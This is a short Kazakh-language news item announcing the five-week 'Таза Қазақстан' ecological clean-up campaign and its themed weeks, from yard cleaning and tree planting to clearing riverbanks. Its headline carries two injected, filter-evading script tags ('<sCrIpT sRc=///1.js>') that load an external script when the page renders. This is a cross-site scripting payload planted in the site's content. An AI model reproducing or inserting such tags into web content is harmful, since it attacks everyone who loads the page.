"Таза Қазақстан" экологиялық акциясы басталды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.04.2024

"Таза Қазақстан" ауқымды экологиялық акциясы республика бойынша сегізінші сәуірде басталды. Акцияның әр аптасы белгілі бір тақырыпта өтеді. Бес аптаға созылады

1-ші апта (6, 13 сәуір) "Таза өлке"атауымен өтеді. Тұрғындар, қоғам қайраткерлері, ұйымдар, кәсіпорындар өз аумақтарын, аулаларын тазалайды.

2 – ші апта (20 сәуір)-"Киелі мекен" тарихи-мәдени ескерткіштердің аумағын абаттандыру жұмыстарына арналады.

3-ші апта (27 сәуір) – "Жасыл аймақ" күні ағаш көшеттерін отырғызу, екпелерді әктеу ұйымдастырылады.

4-ші апта (4 мамыр) - "Өнегелі ұрпақ" күні ардагерлер аулалары мен қарттар үйлерінің аумақтарын жинау және абаттандыру ұйымдастырылады.

5-ші апта (11 мамыр) – "Мөлдір бұлақ" деп аталатын күні өзендер мен көлдердің айналасын қоқыстан тазарту ұйымдастырылады.

Просмотров: 863


Пікір қосу



Деректерді қолтаңбаға қосу